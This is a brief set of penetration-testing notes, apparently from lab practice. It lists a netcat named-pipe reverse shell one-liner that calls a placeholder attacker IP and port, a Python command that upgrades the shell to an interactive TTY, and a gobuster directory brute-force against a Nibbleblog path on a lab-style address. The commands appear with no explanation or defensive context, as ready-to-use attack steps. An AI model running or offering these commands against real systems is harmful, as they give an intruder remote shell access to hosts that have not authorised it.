pentest commands

This will create a reverse shell on linux

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENING PORT) >/tmp/f

upgrade shell to tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

host enumeration




gobuster dir -u http://10.129.42.190/nibbleblog/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt